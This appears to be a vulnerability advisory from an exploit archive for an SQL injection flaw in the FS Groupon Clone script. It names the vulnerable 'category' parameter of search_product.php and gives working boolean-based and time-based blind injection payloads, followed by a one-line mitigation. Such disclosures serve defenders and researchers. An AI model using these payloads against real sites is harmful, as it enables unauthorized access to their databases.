vendor:
FS Groupon Clone
by:
8bitsec
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: FS Groupon Clone
Affected Version From: 23 October 17
Affected Version To: 23 October 17
Patch Exists: YES
Related CWE: N/A
CPE: fortunescripts.com/product/groupon-clone/
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017
FS Groupon Clone – SQL Injection
SQL injection on [category] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/search_product.php?category=1 AND 8132=8132&name=xxxxx Parameter: category (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: category=1 AND 8132=8132&name=xxxxx Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: category=1 AND SLEEP(5)&name=xxxxx
Mitigation:
Input validation, parameterized queries, and stored procedures should be used to prevent SQL injection attacks.